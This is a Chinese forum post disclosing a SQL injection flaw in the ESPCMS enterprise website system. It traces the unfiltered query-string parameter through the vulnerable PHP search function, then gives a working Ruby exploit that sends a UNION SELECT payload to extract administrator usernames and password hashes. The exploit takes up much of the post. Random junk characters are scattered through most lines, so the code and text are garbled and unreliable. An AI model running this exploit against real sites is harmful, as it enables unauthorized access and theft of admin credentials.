0×0 漏洞概述0×1 漏洞细节
8 k/ _) n8 q2 j/ B5 @" {7 c0×2 PoC
0 J0 D# E9 S+ A; H4 ^5 J$ n- f& @. E% g9 Z9 G, l2 o- P* |
) G w" f& Q1 `8 Q
5 L# Q3 ?6 @1 f0 [0×0 漏洞概述
! L8 U: C. v* t
4 V" U& ^( ^9 x$ H易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。5 |) A1 H" B6 e4 h* h& F
其在处理传入的参数时考虑不严谨导致SQL注入发生
# E6 H& Y) L) P- h. \4 B3 h
- ^( a8 k3 T' E/ i, x- I; ~8 k: I6 W( C: g5 q
0×1 漏洞细节
) f. Q1 y2 ~7 I$ o [! ?
+ N. a# F6 ]. e( q变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。3 a3 v) U$ t6 ^/ l3 c: D2 Y- i: h
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。: v* q; X6 Q1 H/ V4 ]: ~/ b4 F
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。* ]& |& a+ O! H' n. z( m5 q
: v) W% b$ m7 N9 A1 e0 E( U
在/interface/3gwap_search.php文件的in_result函数中:8 N6 q5 A! d/ v
$ Z) m! j2 A. M! i; ^5 Z! a0 F( ~
) [! q# v0 l; _, q) A" Q8 u- E" z, y5 j
function in_result() {3 m! i7 R% `) f/ ]
... ... ... ... ... ... ... ... ...( V1 v# _ F4 T K! C1 N# n3 N
$urlcode = $_SERVER[ 'QUERY_STRING '];9 R5 K6 n: }3 T1 m! g3 _! B3 h; i
parse_str(html_entity_decode($urlcode), $output);
+ K2 A. C- \. m( r0 i) a3 ^: V' Z4 E+ D6 m/ a" J) n& _
... ... ... ... ... ... ... ... ...
" ~& A# X V u* C/ r if (is_array($output['attr' ]) && count($output['attr']) > 0) {
; Y$ ]; x; y v d5 ~. l# a6 ]. K3 V
: h) P$ X9 K" Y4 K $db_table = db_prefix . 'model_att';
, ^4 I' P2 S. s: I2 z+ v1 {0 N& o! y9 s0 n5 o# S
foreach ($output['attr' ] as $key => $value) {
+ |$ X8 l$ ~, ?+ S+ g! n0 [$ v1 L% \$ S if ($value) {1 J. v( ?; |! h, B' Q5 |5 U
; _/ @; K& f0 U# Q5 v3 V3 C/ R $key = addslashes($key);+ ~5 a# M( x" z: _
$key = $this-> fun->inputcodetrim($key);1 ~ Y. b% F5 J' u
$db_att_where = " WHERE isclass=1 AND attrname='$key'";( ^2 B* F' l( g) |) F9 d, C
$countnum = $this->db_numrows($db_table, $db_att_where);+ [" c- [& @1 i( L5 z+ i( R2 g7 `
if ($countnum > 0) {
! W% ]7 j/ U) I& y, ` $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
: P( d' t) o' k. Q }
# Q+ M% _5 m# ^1 Q/ v( e. O }9 j5 A& ^8 C) j" K# A, k* U: ?
}
5 H# ]. g$ t) ]4 u) f) @& c3 J }
+ `* X' t5 Q7 Q1 c g if (!empty ($keyword) && empty($keyname)) {
2 |( l4 z! y4 k/ y. t $keyname = 'title';1 p5 B$ Q- S6 N; q$ x0 h3 }$ U) |) l& V S& h
$db_where.= " AND a.title like '%$keyword%'" ;3 Q& Z! x( M2 H( H
} elseif (!empty ($keyword) && !empty($keyname)) {1 g' G, [! `/ e; H
$db_where.= " AND $keyname like '% $keyword%'";
2 s e2 J; g7 m( l3 y }$ ^# n: `' Q: E* `
$pagemax = 15;6 }& \6 J& Z( o- J7 H/ Y( j
" {3 }2 w2 U; C/ X8 W- |9 N" O
$pagesylte = 1;- y$ j7 U3 n+ }' J5 E4 N
: m5 m9 h+ P1 |& i
if ($countnum > 0) {
5 B8 V/ E* I9 {( ~1 g G/ I9 B: [3 N5 m, I1 @8 O+ j
$numpage = ceil($countnum / $pagemax);
: y0 s) H+ k. P9 t: Y7 m } else {
8 v# U) w" K6 d. ]$ ^ $numpage = 1;2 r: [+ t5 z$ s) C( L5 U
}2 b2 {% x' T" N$ n
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;9 h4 P: ` R: n, D; f) s
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
2 V# s/ {! `: j! S$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);6 j. E0 ^2 P' k9 f
... ... ... ... ... ... ... ... ..., x* J8 S. d/ \' b, ?" j
}0 `" A+ _4 X. }9 X6 o
- m4 j" J3 M" U( j
; z6 n. u: W6 o3 z* T. X
0×2 PoC
! v% w% E5 Q$ |: H b& H7 Z. u5 m! t* r/ n3 X
! @- v- @) Y6 v9 W- @2 d2 e3 _% ~
/ h, W L) b- E( u) b9 k3 irequire "net/http"/ u: j3 ^2 Q E; @6 Y3 ^7 o; g6 h" C' |
1 C3 p$ z8 I" L2 z, |3 O( @% w+ m
def request(method, url)
6 C L2 I- w7 `2 F if method.eql?("get")
: ]( l- `% n- I* P; h$ i uri = URI.parse(url)
$ s7 K9 `' Q% F, j& G' b6 Q5 B! R5 M http = Net::HTTP.new(uri.host, uri.port)
# f0 v& L: l2 V2 |0 T& O: b response = http.request(Net::HTTP::Get.new(uri.request_uri))
6 f% N4 Y& k3 r7 j* ? return response
3 e; r3 }/ a- i0 _: b) Z7 a end
5 w8 [6 c- D6 m- x. ]1 \7 Eend
! p* b9 E |+ S2 F
: A9 v9 {) I6 E" \8 S0 j! ^doc =<<HERE
2 I# k5 g! x# N$ z% |, G ~+ n-------------------------------------------------------
( t. j w) w4 [5 k7 ]Espcms Injection Exploit
# \* B1 M' d) O6 N# _Author:ztz
1 d. R4 Q+ g2 j3 H9 nBlog:http://ztz.fuzzexp.org/
# M- b8 H1 s# L: k" |6 c* o-------------------------------------------------------
# Z3 @/ P! m+ b& n
6 i5 [9 P' h/ a" NHERE* b" J" o( f" e9 V' t( _
8 v1 Z0 M/ @0 b/ l% {usage =<<HERE9 u' g: ], H" n7 V
Usage: ruby #{$0} host port path3 i& H5 m" n- `/ v. I
example: ruby #{$0} www.target.com 80 /" G5 C5 m5 E9 z& U! r
HERE1 E" C7 ^7 b/ R+ v% V# q1 r, ~
" c( [' X5 v* k l( w! |2 D
puts doc8 ]- ~2 h* [9 H) v" |
if ARGV.length < 3
: Z) o) F% v3 i' ^2 ~) Q* l puts usage
; e. w! [" g- H Z2 r7 ?else
$ [# k* _* p9 J; ` $host = ARGV[0]
2 U) K2 }) m% z: o $port = ARGV[1]
7 F+ a# p9 M9 \ $path = ARGV[2]
k/ _" c9 i+ k' s7 _( D* P* ^% z+ A% n
puts "send request..."# b5 S; v- r) [0 v
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
! {1 Q$ F) I% C7 l$ iattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
* Z5 r( C" V0 k5 h% [,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27) n# d% v0 J9 ~5 s9 H3 p2 C
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
9 J* a. I( W# S response = request("get", url)
+ F. j$ Y* f9 _& b# o" L. F1 h result = response.body.scan(/\w+&\w{32}/)" {7 ]% X6 X- b& q! M* s5 q
puts result) O$ a- Z; M" t! g
end3 d) `: t% T# `4 l& y1 {7 W
7 L# E0 S2 o# S9 t0 O
|
发表于 2013-7-27 18:31:52
收藏
支持
反对